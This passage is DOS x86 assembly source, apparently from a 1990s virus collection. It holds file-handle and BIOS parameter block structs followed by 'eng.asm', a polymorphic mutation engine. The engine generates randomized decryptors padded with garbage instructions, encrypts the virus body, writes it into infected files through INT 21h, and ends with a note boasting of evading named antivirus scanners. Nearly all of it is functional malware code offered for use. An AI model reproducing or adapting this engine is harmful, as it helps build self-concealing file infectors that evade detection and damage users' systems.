;       2Fh    WORD    (SHARE.EXE) network machine number which opened file  ;
;       31h    WORD    PSP segment of file's owner (see AH=26h)              ;
;       33h    WORD    offset within SHARE.EXE code segment of               ;
;              sharing record (see below)  0000h = none                      ;
;----------------------------------------------------------------------------;                                                                            



dcb             struc
dcb_users       dw      ?
dcb_mode        dw      ?
dcb_attr        db      ?
dcb_dev_attr    dw      ?
dcb_drv_addr    dd      ?
dcb_1st_clst    dw      ?
dcb_time        dw      ?
dcb_date        dw      ?
dcb_size        dd      ?
dcb_pos         dd      ?
dcb_last_clst   dw      ?
dcb_current_clst dw     ?
dcb_dir_sec     dw      ?
dcb_dir_entry   db      ?
dcb_name        db      8 dup(?)
dcb_ext         db      3 dup(?)
dcb_useless1    dw      ?
dcb_useless2    dw      ?
dcb_useless3    dw      ?
dcb_psp_seg     dw      ?
dcb_useless4    dw      ?
dcb             ends

bpb                     STRUC
bpb_Bytes_Per_Sec       dw ?
bpb_Sec_Per_Clust       db ?
bpb_Reserved_Sectors    dw ?               
bpb_FATs                db ?             ; Number of FATs
bpb_Root_Dir_Entries    dw ?             ; Max number of root dir entries
bpb_Sectors             dw ?             ; number of sectors; small
bpb_Media               db ?             ; Media descriptor byte
bpb_Sectors_Per_FAT     dw ?
bpb_Sectors_Per_Track   dw ?               
bpb_Heads               dw ?             ; number of heads
bpb_Hidden_Sectors      dd ?
bpb_Huge_Sectors        dd ?             ; number of sectors; large
bpb_Drive_Number        db ?
bpb_Reserved            db ?
bpb_Boot_Signature      db ?
bpb_Volume_ID           dd ?
bpb_Volume_Label        db 11 dup(?)
bpb_File_System_Type    db 8 dup(?)
bpb                     ENDS


register        struc
reg_es          dw      ?
reg_ds          dw      ?
reg_di          dw      ?
reg_si          dw      ?
reg_bp          dw      ?
reg_dx          dw      ?
reg_cx          dw      ?
reg_bx          dw      ?
reg_ax          dw      ?
reg_f           dw      ?
register        ends

sys_file        struc
sys_next        dd      ?
sys_strat       dw      ?
sys_int         dw      ?
sys_file        ends
                
                
                end
-----------------------------<<eng.asm>>---------------------------------------

_ax             equ     0
_cx             equ     1
_dx             equ     2
_bx             equ     3
_sp             equ     4
_bp             equ     5
_si             equ     6
_di             equ     7

                
engine:         mov     ds:pointer,ax           ; save IP
                mov     di,offset decrypt
                mov     bx,offset make_count
                mov     cx,offset make_key
                mov     dx,offset make_ptr
                mov     si,offset order_ret
                or      bp,11101111b            ; SP is used
                call    order                   ; randomize and call registers
                push    di                      ; save start of loop
                push    di
                mov     si,offset encode
                mov     di,offset write_buff
                mov     cx,encode_end-encode
                rep     movsb                   ; copy write code
                mov     ds:encode_ptr,offset (encode_break-encode)+write_buff
                pop     di
                mov     bx,offset make_enc
                mov     cx,offset make_keychange
                mov     dx,offset make_deccount
                mov     si,offset make_incptr
                call    order                   ; call routines

;=====( Preform loop )=======================================================;

                mov     ax,2
                push    ax
                call    random                  ; test BP for 4000?
                pop     ax
                jz      loop_no_test
                test    bp,4000h                ; possible to just "Jcc"?
                jnz     loop_make_jcc
loop_no_test:   call    random
                jz      loop_no_test1
                test    bp,2000h                ; use loop?
                jnz     loop_make_jcc
loop_no_test1:  or      bp,800h                 ; do not change flags
                mov     ax,2
                cwd
                call    random                  ; try OR/AND/TEST reg,reg
                                                ; or XOR/ADD/OR/SUB reg,0?
                mov     al,ds:count_reg         ; get counter
                jnz     loop_orandtest
                call    boolean                 ; do XOR/OR/ADD or ADD/SUB?
                jnz     loop_modify
                call    add_reg                 ; ADD/SUB reg,0
                jmp     loop_make_jcc

loop_modify:    call    modify_reg              ; XOR/OR/ADD reg,0
                jmp     loop_make_jcc

loop_orandtest: mov     cl,3
                mov     ch,al
                shl     ch,cl
                or      al,ch                   ; set reg1 as reg2 also
                mov     bx,2                    ; OR/AND/TEST
                call    random_bx
                jnz     loop_and
                or      ax,9c0h                 ; OR reg1, reg2
loop_reverse:   call    boolean                 ; use 9 or 11?
                jnz     loop_orandteststo
                or      ah,2h                   ; reg2, reg1
                jmp     loop_orandteststo

loop_and:       dec     bx
                jnz     loop_test
                or      ax,21c0h                ; AND reg1, reg2
                jmp     loop_reverse

loop_test:      or      ax,85c0h                ; TEST reg1, reg2
loop_orandteststo:
                xchg    al,ah
                stosw                           ; store TEST/OR/AND
                or      bp,1800h                ; do not change flags/
                                                ; test stored
                call    garble
loop_make_jcc:  and     bp,not 800h
                test    bp,2000h                ; code loop?
                jz      loop_make_jump
                mov     al,0e2h                 ; LOOP
                test    bp,1000h                ; possible to use LOOPNZ/Z?
                jz      loop_code_disp
                call    boolean
                jnz     loop_code_disp
                dec     ax                      ; LOOPZ
                call    boolean
                jnz     loop_iscx
                dec     ax                      ; LOOPNZ
                jmp     loop_code_disp
                
;=====( Now make conditional jump )==========================================;

jcc_tbl:        db      75h,79h,7dh,7fh         ; JNE/JNS/JG/JGE

loop_make_jump: mov     bx,offset jcc_tbl
                mov     ax,3
                call    random
                xlat                            ; get Conditional jump
                mov     bx,2
                call    random_bx               ; use JE/JS/LE/L then JMP?
                jnz     loop_code_disp
                cmp     ds:count_reg,_cx        ; CX is counter?
                jnz     loop_notcx
                mov     bl,4
                call    random_bx
                jnz     loop_notcx
                mov     al,0e3h + 1             ; JCXZ + 1
loop_notcx:     dec     ax
loop_iscx:      stosw
                cmp     al,07fh                 ; Jcxz/loopz?
                ja      loop_code_short
                call    boolean                 ; Use opposite or EB?
                jnz     loop_code_short
                or      bp,800h                 ; dont change flags
loop_code_short:mov     si,di                   ; save offset of displacement
                call    garble
                lea     ax,ds:[si-2]
                sub     ax,di
                neg     al                      ; get jump displacement
                mov     ds:[si-1],al            ; save it
                test    bp,800h                 ; Dont change flags -> "Jcc"
                mov     al,0ebh                 ; Jmp short
                je      loop_code_disp
                mov     ax,3
                call    random
                mov     bx,offset jcc_tbl
                xlat                            ; Get JNE/JNS/JG/JGE
loop_code_disp: stosb                           ; store jump
                pop     ax                      ; start of loop
                dec     ax
                sub     ax,di                   ; get loop displacement
                stosb
                or      bp,11101111b            ; free all registers
                and     bp,not 800h             ; allow flags to change
                call    garble
                mov     ax,19
                call    random                  ; 1 in 20 chance of non-jmp
                jnz     loop_code_jmp
                mov     ax,ds:pointer
                add     ax,offset file_start    ; where to jump
                xchg    dx,ax
                call    get_reg                 ; get a register
                call    mov_reg                 ; Mov value into register
                or      ax,0ffc0h + (4 shl 3)   ; JMP reg16
                call    boolean                 ; PUSH/RET or JMP reg16?
                jnz     loop_code_push
                xchg    al,ah
                jmp     loop_code_stosw

loop_code_push: mov     bx,2
                call    random_bx               ; 1 in 3 chance of FF /6 PUSH
                jnz     loop_code_push1
                xor     al,(6 shl 3) xor (4 shl 3) ; PUSH reg
                xchg    al,ah                
                stosw
                jmp     loop_code_ret

loop_code_push1:xor     al,50h xor (0c0h or (4 shl 3)) ; PUSH reg
                stosb
loop_code_ret:  call    garble
                mov     al,0c3h                 ; RETN
                stosb
                jmp     loop_code_end

loop_code_jmp:  mov     al,0e9h
                stosb                           ; Store Jump
                lea     ax,ds:[di-((file_start-2)-v_start)]
                neg     ax                      ; Jmp file_start
loop_code_stosw:stosw
loop_code_end:  mov     si,ds:encode_enc_ptr    ; get encrypt instruction ptr                                
                cmp     di,offset header        ; Decryptor is too large?
                jb      go_write_buff
                stc                             ; return error
                pushf
                pop     bp
                retn

go_write_buff:  jmp     write_buff              ; encrypt/write/decrypt


;=====( Inc pointer )========================================================;

make_incptr:    mov     ax,word ptr ds:ptr_reg  ; get pointer registers
                mov     dx,2                    ; ADD ptr,2
                cmp     ah,-1                   ; two registers used?
                jz      make_incptr_1
                call    boolean                 ; do one or both?
                jnz     make_incptr_do1
                dec     dx                      ; ADD ptr,1
                call    make_incptr_do1
                jmp     make_incptr_2

make_incptr_do1:call    boolean
                jnz     make_incptr_1
make_incptr_2:  xchg    al,ah
make_incptr_1:  call    add_reg
                sub     ds:disp,dx              ; add to displacement
                retn 

;=====( Dec counter )========================================================;

make_deccount:  cmp     si,offset make_deccount ; last operation?
                jnz     make_deccount_notlast
                call    boolean                 ; do it?
                jnz     make_deccount_notlast
                or      bp,4800h                ; remember we're last
make_deccount_notlast:
                mov     al,ds:count_reg
                cmp     al,_cx                  ; possible to use LOOP/LOOPNZ?
                jnz     make_deccount_notcx
                call    boolean
                jnz     make_deccount_notcx
                or      bp,2000h                ; do LOOP
                jmp     make_deccount_exit

make_deccount_notcx:
                mov     dx,-1                   ; ADD counter,-1
                call    add_reg
make_deccount_exit:
                or      bp,400h                 ; deccount executed
                retn                   

;=====( Make encryption instruction )========================================;

make_enc:       push    bp
                and     bp,not 400h
                mov     al,ds:key_reg
                push    ax                      ; save key register
make_enc_which: mov     ax,4                    ; ADD/SUB/XOR/ROR/ROL
                call    random
                mov     bx,0105h                ; ADD [DI],AX
                mov     cx,1119h                ; ADC/SBB
                mov     dx,2905h                ; SUB [DI],AX
                jz      make_enc_add
                dec     ax
                jz      make_enc_sub
                dec     ax
                jnz     make_enc_ror
                mov     bh,31h                  ; XOR
                mov     dx,3105h                ; XOR [DI],AX
                jmp     make_enc_sto

make_enc_ror:   cmp     ds:key_reg,_cx          ; CX is key?
                jne     make_enc_which
                or      bp,400h                 ; Put XCHG CX,AX
                mov     bh,0d3h
                mov     dx,0d30dh               ; ROL 
                dec     ax
                jz      r_make_enc_sto
                xchg    bx,dx                   ; ROR
r_make_enc_sto: mov     ds:key_reg,al           ; 1 SHL 3 = 08 / D3 08
                                                ; D3 00 = ROL [],CL
                jmp     make_enc_sto

make_enc_sub:   xchg    dh,bh                   ; SUB - ADD [DI],AX
                xchg    cl,ch                   ; SBB/ADC
make_enc_add:   call    boolean                 ; do Carry?
                jnz     make_enc_sto
                push    bx
                mov     bh,ch                   ; Make it ADC/SBB
                call    clear_carry
                cmp     al,0
                org     $ - 1
make_enc_sto:   push    bx
                test    bp,8000h                ; EXE file?
                jz      make_enc_com
                call    is_bp_ptr               ; is BP a pointer?
                je      make_enc_com
                mov     al,2eh                  ; CS:
                call    boolean
                jnz     make_enc_cs
                mov     al,36h                  ; SS:
make_enc_cs:    stosb                           ; store segment override
make_enc_com:   mov     al,bh
                stosb                           ; store instruction
                mov     ax,word ptr ds:ptr_reg  ; get pointer registers
                cmp     ah,-1                   ; second reg?
                je      make_enc_xlat
                add     al,ah
make_enc_xlat:  mov     bx,offset rm_tbl
                xlat                            ; get r/m
                call    is_bp_ptr               ; is BP a pointer?
                jnz     make_enc_nobp
                inc     ah                      ; is there a second reg?
                jne     make_enc_nobp
                or      al,01000000b            ; [BP+xx]
make_enc_nobp:  mov     cx,ds:disp              ; get displacement
                mov     bx,6
                call    random_bx               ; allow no displacement?
                jz      make_enc_get_disp
                jcxz    make_enc_sto_rm
make_enc_get_disp:
                or      al,01000000b            ; 8bit displacement
                call    boolean                 ; allow 8bit displacement?
                jnz     make_enc_16bit
                cmp     cx,7fh                  ; 8bit displacement?
                jbe     make_enc_sto_rm         
                cmp     cx,-80h
                jb      make_enc_16bit
                xor     ch,ch
                cmp     ax,0
                org     $ - 2
make_enc_16bit: xor     al,11000000b            ; 8bit off, 16bit on
make_enc_sto_rm:mov     ah,ds:key_reg
                shl     ah,1
                shl     ah,1
                shl     ah,1                    ; from bits 0-2 of AH
                or      al,ah                   ; to bits 3-5 of AL
                stosb                           ; store r/m byte 
                test    al,11000000b            ; any displacement?
                jz      make_enc_disp
                test    al,10000000b            ; 16bit displacement?
                xchg    cx,ax
                stosw                           ; store displacement
                jnz     make_enc_disp
                dec     di                      ; 8bit only
make_enc_disp:  xchg    di,ds:encode_ptr        ; get encode ptr
                test    bp,400h                 ; store XCHG CX,AX?
                je      make_enc_nor
                mov     al,91h                  ; XCHG CX,AX
                stosb
make_enc_nor:   xchg    dx,ax
                xchg    al,ah
                mov     ds:encode_enc_ptr,di    ; save instruction pointer
                stosw                           ; set encryption instruction
                je      make_enc_nor1
                mov     al,91h                  ; XCHG CX,AX
                stosb
make_enc_nor1:  xchg    di,ds:encode_ptr        ; restore decrypt ptr
                pop     ax
                xchg    al,ah
                mov     word ptr ds:write_buff[encode_flip-encode],ax 
                                                ; save opposite operation
                pop     ax 
                mov     ds:key_reg,al           ; restore key register
                pop     bp
                retn
                
rm_tbl:         db      -1,-1,-1,7,-1,6,4,5,-1,0,1,2,3  ; -1's not used

;=====( Change key )=========================================================;

make_keychange: call    boolean                 ; change key?
                jnz     make_keychange_yes
                retn
                
make_keychange_yes:
                push    bp
                or      bp,200h                 ; let know that keychange
                mov     ax,3
                call    random                  ; 1 in 4 chance of modify_reg
                jnz     keychange_other
                call    random_1
                xchg    dx,ax                   ; Random value to modify key
                                                ; reg by
                mov     al,ds:key_reg
                call    modify_reg              ; XOR/ADD/OR
keychange_stoop:xchg    di,ds:encode_ptr        ; get ptr to encode
                inc     di                      ; CLC
                mov     al,ds:modify_op         ; get operation
                stosb
keychange_stodx:xchg    dx,ax                   ; store value/operation
keychange_sto:  stosw
                xchg    di,ds:encode_ptr        ; get decrypt pointer
                pop     bp
                retn

keychange_other:mov     al,4                    ; ROR/ROL/NOT/NEG/ADD
                call    random 
                jnz     keychange_rol
                mov     ax,0d1c0h               ; ROR AX,1
keychange_cl:   mov     bx,2                    ; 1 in 3 chance of ,CL
                call    random_bx
                jnz     keychange_nocl
                cmp     ds:count_reg,_cx          ; Count is CX?
                jne     keychange_nocl
                test    bp,400h                 ; Count already decremented?
                jnz     keychange_nocl
                or      ah,2                    ; By CL
keychange_nocl: xchg    al,ah
                push    ax
                or      ah,ds:key_reg           ; set key register
                stosw                           ; store instruction
                pop     ax
                xchg    di,ds:encode_ptr        ; get encode ptr
                jmp     keychange_sto

keychange_rol:  dec     ax
                jnz     keychange_not
                mov     ax,0d1c0h or (1 shl 3)  ; ROL AX,1
                jmp     keychange_cl

keychange_not:  dec     ax
                jnz     keychange_neg                
                mov     ax,0f7c0h + (2 shl 3)   ; NOT AX
                jmp     keychange_nocl

keychange_neg:  dec     ax
                jnz     keychange_add
                mov     ax,0f7c0h + (3 shl 3)   ; NEG AX
                jmp     keychange_nocl

keychange_add:  call    random_1
                xchg    dx,ax
                mov     al,ds:key_reg           ; get key register
                call    add_reg                 ; ADD reg(ax), value(dx)
                jmp     keychange_stoop

;=====( Build key )==========================================================;

make_key:       call    get_reg                 ; get register
                xchg    dx,ax
                call    random_1                ; get key
                mov     ds:key,ax               ; save key
                xchg    dx,ax
                mov     ds:key_reg,al           ; save register
                call    mov_reg                 ; MOV reg(ax),value(dx)
                retn

;=====( Build counter )======================================================;

make_count:     call    get_reg                 ; get register
                mov     ds:count_reg,al         ; save register
                mov     dx,(decrypt-v_start)/2  ; # of words to crypt
                call    mov_reg                 ; mov reg(ax),value(dx)
                retn

;=====( Build Pointer )======================================================;

make_ptr:       mov     dx,ds:pointer
                call    get_ptr_reg             ; get DI/SI/BP/BX
                mov     ds:ptr_reg,al
                mov     ds:ptr_reg1,-1          
                mov     bx,3
                call    random_bx               ; 1 in 4 chance of 2 regs
                jnz     make_ptr_2
                cmp     al,_si
                mov     bx,11000000b            ; DI/SI
                jb      make_ptr_test
                mov     bl,00101000b            ; BP/BX
make_ptr_test:  test    bp,bx                   ; 'other' availible?
                jz      make_ptr_2
make_ptr_again: call    get_ptr_reg             ; get DI/SI/BP/BX
                push    ax
                call    conv_num                ; convert to bit-map number
                test    al,bl                   ; is it other type?
                pop     ax
                jnz     make_ptr_ok
                call    del_reg                 ; delete register
                jmp     make_ptr_again

make_ptr_ok:    mov     ds:ptr_reg1,al          ; save second register
                mov     bx,-1
                call    random_bx
                sub     dx,bx                   ; randomize values
                xchg    bx,dx
                call    mov_reg                 ; mov reg(ax), value(dx)
                xchg    bx,dx
                mov     al,ds:ptr_reg           ; get first reg
make_ptr_2:     xor     bx,bx                   ; zero displacement
                call    boolean                 ; use one?
                jnz     make_ptr_nodisp
                mov     bx,-1
                call    random_bx
                sub     dx,bx                   ; subtract displacement
make_ptr_nodisp:mov     ds:disp,bx              ; save displacement
                call    mov_reg                 ; mov reg(ax), value(dx)
                retn
                
;=====( Shell for mov_reg1 )=================================================;

mov_reg:        push    bx dx
                mov     bx,4
                call    random_bx               ; 1 in 5 chance of MOV/ADD/SUB
                jnz     mov_reg_call
                mov     bx,-1
                call    random_bx               ; get random #
                sub     dx,bx                   ; MOV reg, value-random #
                call    mov_reg1                ; do MOV reg,
                mov     dx,bx
                call    add_reg                 ; Now add difference
                pop     dx bx
                retn

mov_reg_call:   pop     dx bx

;=====( Mov reg(ax), value(dx) )=============================================;

mov_reg1:       push    ax bx cx dx
                cbw
                mov     bx,2
                call    random_bx               ; MOV or SUB/XOR ADD/OR/XOR
                jz      mov_reg_other
                mov     bl,2
                call    random_bx               ; 1 in 3 chance of c6/c7 MOV
                jnz     mov_reg_b0
                or      ax,0c7c0h               ; MOV reg,imm
                call    boolean                 ; Do long MOV or LEA?
                jnz     mov_reg_c7
                mov     cl,3
                shl     al,cl                   ; Reg -> bits 3,4,5
                xor     ax,(8d00h or 110b) xor 0c700h  ; LEA reg,[imm]
mov_reg_c7:     xchg    al,ah
                stosw                           ; store it
mov_reg_sto:    xchg    dx,ax
                stosw                           ; store value
                call    garble
mov_reg_exit:   jmp     modify_pop

mov_reg_b0:     or      al,0b8h                 ; MOV reg,imm
                stosb
                jmp     mov_reg_sto

mov_reg_other:  push    ax
                mov     cl,3
                mov     ch,al
                shl     ch,cl                   ; copy reg1 to reg2
                or      al,ch                   ; set it
                call    boolean
                jnz     mov_reg_other1
                or      ah,2                    ; reg1, reg2 -> reg2, reg1
mov_reg_other1: call    boolean
                jnz     mov_reg_xor
                or      ax,29c0h                ; SUB reg, reg
                call    boolean
                jnz     mov_reg_other_sto
                xor     ah,19h xor 29h          ; SBB reg, reg
                call    clear_carry             ; clear carry flag
mov_reg_other_sto:
                xchg    al,ah
                stosw
                call    garble
                pop     ax
                call    modify_reg              ; ADD/OR/XOR reg(ax),value(dx)
                jmp     mov_reg_exit

mov_reg_xor:    or      ax,31c0h                ; XOR AX,AX
                jmp     mov_reg_other_sto

;=====( ADD/OR/XOR reg(ax), value(dx) )======================================;

modify_reg:     push    ax bx cx dx
                cbw
                mov     bx,2
                call    random_bx
                mov     cx,3500h + (6 shl 3)    ; XOR
                jz      modify_reg_cont
                mov     cx,0d00h + (1 shl 3)    ; OR
                dec     bx
                jz      modify_reg_cont
modify_reg_add: mov     cx,0500h                ; ADD
                call    boolean                 ; ADC or ADD?
                jnz     modify_reg_cont
                mov     cx,1500h + (2 shl 3)    ; ADC
modify_reg_clc: call    clear_carry             ; Clear carry flag
modify_reg_cont:test    bp,200h                 ; keychange executing?
                jz      modify_reg_nosave
                mov     ds:modify_op,ch         ; save AX operation
modify_reg_nosave:
                call    boolean                 ; check if AX?
                jnz     modify_reg_noax
                or      al,al                   ; AX?
                jnz     modify_reg_noax
                mov     al,ch
                stosb                           ; store instruction
                xchg    dx,ax
modify_sto:     stosw                           ; store value
modify_exit:    call    garble
modify_pop:     pop     dx cx bx ax
                retn

modify_reg_noax:or      ax,81c0h
                or      al,cl                   ; XOR/OR/ADD
                call    boolean                 ; sign extend?
                jnz     modify_reg_nosign
                cmp     dx,7fh                  ; possible to sign extend?
                jbe     modify_sign
                cmp     dx,-80h
                jb      modify_reg_nosign
modify_sign:    or      ah,2                    ; sign extend
modify_reg_nosign:                
                xchg    al,ah
                stosw
                test    al,2                    ; sign extended?
                xchg    dx,ax
                je      modify_sto
                stosb
                jmp     modify_exit
                
;=====( ADD reg(ax), value(dx) )=============================================;

add_reg:        push    ax bx cx dx
                cbw
                mov     cx,dx
add_loop:       mov     bx,3
                call    random_bx               ; 1 in 4 chance of ADD/SUB
                jz      add_noinc
                mov     bx,40c0h                ; INC reg
                test    bp,200h                 ; keychange running?
                jz      add_nosave
                mov     ds:modify_op,05h        ; ADD AX,
add_nosave:     cmp     cx,3h                   ; too high to INC?
                jb      add_inc
                neg     cx
                cmp     cx,3h                   ; too low to DEC?
                ja      add_noinc
                mov     bx,48c0h + (1 shl 3)    ; DEC reg
                test    bp,200h
                jz      sub_nosave
                mov     ds:modify_op,2dh        ; SUB AX,
sub_nosave:     inc     dx
                inc     cx
                cmp     ax,0
                org     $ - 2
add_inc:        dec     dx
                dec     cx
                push    ax
                mov     ax,5
                call    random                  ; 1 in 6 chance of FF
                pop     ax      
                push    ax
                jnz     add_inc_40
                mov     ah,0ffh
                xchg    bl,bh
                xchg    al,ah                   ; AL=ff AH=Reg
                stosb 
                xchg    al,ah
add_inc_40:     or      al,bh                   ; set DEC/INC
                stosb
                pop     ax
                call    garble
                or      dx,dx                   ; all done?
                jnz     add_loop
add_reg_exit:   jmp     modify_pop

add_noinc:      call    boolean                 ; ADD or SUB?
                jz      sub_reg
                jmp     modify_reg_add
                
sub_reg:        test    bp,200h                 ; keychange?
                jnz     sub_reg_key
                neg     dx
sub_reg_key:    mov     cx,2d00h + (5 shl 3)    ; SUB
                call    boolean                 ; use SBB?
                jz      sbb_reg
                jmp     modify_reg_cont

sbb_reg:        mov     cx,1d00h + (3 shl 3)    ; SBB
                jmp     modify_reg_clc
                
;=====( clear carry flag )===================================================;

clear_carry:    push    ax bp
                or      bp,800h                 ; don't change flags
                mov     al,0f8h                 ; CLC
                call    boolean
                jnz     clear_carry_clc
                mov     ax,0f5f9h               ; STC/CMC
                stosb
                call    garble
                xchg    al,ah
clear_carry_clc:stosb
                call    garble
                pop     bp ax
                retn

garble:         push    ax
                mov     ax,2
                call    random                  ; how many times to call?
                xchg    cx,ax
                jcxz    garble_exit
garble_loop:    call    garble1
                loop    garble_loop
garble_exit:    xchg    cx,ax
                pop     ax
                retn

;=====( add garbage code )===================================================;

garble1:        push    ax bx cx dx bp
                test    bp,100h                 ; Garble already executing?
                jnz     garble_ret
                and     bp,not 200h             ; keychange not executing
                or      bp,100h                 ; Garble executing
                call    boolean
                jnz     garble_ret
                mov     cl,3
                call    random_1
                xchg    dx,ax                   ; DX=random number
                call    get_reg                 ; get register
                jc      garble_ret
                mov     bx,6
                test    bp,800h                 ; flag change allowed?
                jz      garble_f
                mov     bl,2
garble_f:       call    random_bx            ; MOV/1BYTE/XCHG/MODIFY/ADD/MOV?
                jnz     garble_xchg
                or      ah,89h
garble_reg_set: call    boolean                 ; reg1, reg2 or reg2, reg1?
                jz      garble_reg_reg
                or      ah,2                    ; 8b
                xchg    al,dl
garble_reg_reg: and     dl,7                    ; Get register values only
                and     al,7
                shl     dl,cl
                or      al,0c0h                 ; MOV reg1, random reg
                or      al,dl
                xchg    al,ah
                stosw
garble_ret:     pop     bp 
                jmp     modify_pop

garble_xchg:    dec     bx
                jnz     garble_1byte
                xchg    dx,ax
                call    get_reg                 ; get another reg
                jc      garble_ret
                xchg    dx,ax                   ; AL=reg1 DL=reg2
                call    boolean
                jnz     garble_xchgnoax
                or      dl,dl                   ; AX?
                jz      garble_xchgax
                or      al,al
                jz      garble_xchgax
garble_xchgnoax:or      ah,87h                  ; XCHG reg1,
                jmp     garble_reg_reg

garble_xchgax:  or      al,90h
                or      al,dl                   ; XCHG AX, reg
garble_stosb:   stosb
                jmp     garble_ret
                
garble_1byte:   dec     bx
                jnz     garble_modify
                mov     al,4
                call    random
                mov     bx,offset garble_1byte_tbl
                xlat                            ; get 1 byte instruction
                jmp     garble_stosb
                
garble_modify:  dec     bx
                jnz     garble_add
                call    modify_reg              ; ADD/XOR/OR reg1, random #
                jmp     garble_ret

garble_add:     dec     bx
                jnz     garble_mov
                call    add_reg                 ; ADD/SUB reg1, random #
                jmp     garble_ret

garble_mov:     dec     bx
                jnz     garble_op
                call    mov_reg                 ; MOV reg1, random #
                jmp     garble_ret

garble_op:      and     dh,00111000b            ; get rnd op
                mov     ah,1
                or      ah,dh
                jmp     garble_reg_set

garble_1byte_tbl:
                db      2eh
                db      36h
                cld
                std
                sti
                
;=====( Is BP a Pointer? )===================================================;

is_bp_ptr:      cmp     ds:ptr_reg,_bp
                je      bp_is_ptr
                cmp     ds:ptr_reg1,_bp
bp_is_ptr:      retn

;=====( Get pointer register (DI/SI/BP/BX) )=================================;

get_ptr_regnext:call    del_reg                 ; restore register to pool

get_ptr_reg:    call    get_reg                 ; get register
                cmp     al,_bx
                je      got_ptr_reg
                cmp     al,_bp
                jb      get_ptr_regnext
got_ptr_reg:    retn

;=====( return random register in AL )=======================================;

get_reg:        test    bp,11101111b            ; any registers free?
                stc
                jz      get_reg_exit
get_reg_loop:   mov     ax,7
                call    random
                push    ax
                cbw
                call    conv_num                ; convert to bit map
                test    bp,ax                   ; is register free?
                pushf
                not     ax
                and     bp,ax                   ; mark register
                popf
                pop     ax
                jz      get_reg_loop
get_reg_exit:   retn
                
;=====( Restore register to pool )===========================================;

del_reg:        push    ax
                cbw
                call    conv_num                ; convert to bit number
                or      bp,ax                   ; restore register
                pop     ax
                retn

;=====( convert number to bit map )==========================================;

conv_num:       push    cx
                mov     cl,al
                mov     al,1
                shl     al,cl
                pop     cx
                retn

;=====( randomize order of BX/CX/DX/SI, then call )==========================;

order:          call    garble
                mov     ax,2
                call    random
                xchg    cx,ax
                inc     cx
order_loop:     call    boolean
                jnz     order1
                xchg    bx,ax
order1:         call    boolean
                jnz     order2
                xchg    dx,ax
order2:         call    boolean
                jnz     order3
                xchg    si,ax
order3:         loop    order_loop
                push    si dx bx ax
order_ret:      retn

;=====( return random number between 0 and ffff in bx )======================;

random_bx:      xchg    bx,ax
                call    random
                xchg    bx,ax
                retn

;=====( flip Sign bit )======================================================;

boolean:        push    ax
                mov     ax,1
                call    random
                pop     ax
                retn

;=====( return random number between 0 and ffff )============================;

random_1:       mov     ax,-1

;=====( Generate random number between 0 and AX )============================;

random:         push    ds bx cx dx ax
                xor     ax,ax
                int     1ah
                push    cs
                pop     ds
                in      al,40h
                xchg    cx,ax
                xchg    dx,ax
                mov     bx,offset ran_num
                xor     ds:[bx],ax
                rol     word ptr ds:[bx],cl
                xor     cx,ds:[bx]
                rol     ax,cl
                xor     dx,ds:[bx]
                ror     dx,cl
                xor     ax,dx
                imul    dx
                xor     ax,dx
                xor     ds:[bx],ax
                pop     cx
                xor     dx,dx
                inc     cx
                je      random_ret
                div     cx
                xchg    ax,dx
random_ret:     pop     dx cx bx ds
                or      ax,ax
                retn
                    
ran_num         dw      ?

;=====( Encrypts the code/writes it/decrypts code )==========================;

encode:         mov     bx,ds:handle
                mov     ax,0
key             =       word ptr $ - 2
                mov     cx,(decrypt-v_start)/2
                xor     di,di
encode_break:   clc
                clc
                clc
                clc                     ; XCHG CX,AX XCHG CX,AX
                clc
                clc                     ; CLC ADD AX,xxxx / XOR [DI],AX
                clc
                clc                     ; XOR [DI],AX / CLC ADD AX,xxxx
                inc     di
                inc     di
                loop    encode_break
encode_ret      =       byte ptr $    
                mov     ah,40h
                mov     cx,file_size
                cwd
                pushf
                call    cs:int_21
                jc      encode_flag
                sub     ax,cx
encode_flag:    pushf
                pop     bp
                mov     word ptr ds:[si],0
encode_flip     =       word ptr $ - 2
                mov     byte ptr ds:write_buff[encode_ret-encode],0c3h
                jmp     encode
encode_end:
                          ;Need more Virii Codes Alevirus 1997 Foda-se
                          ;Scan, F-prot, Tbav, And All Virii Busters

 -=[+]===============================[END]============================[+]=-
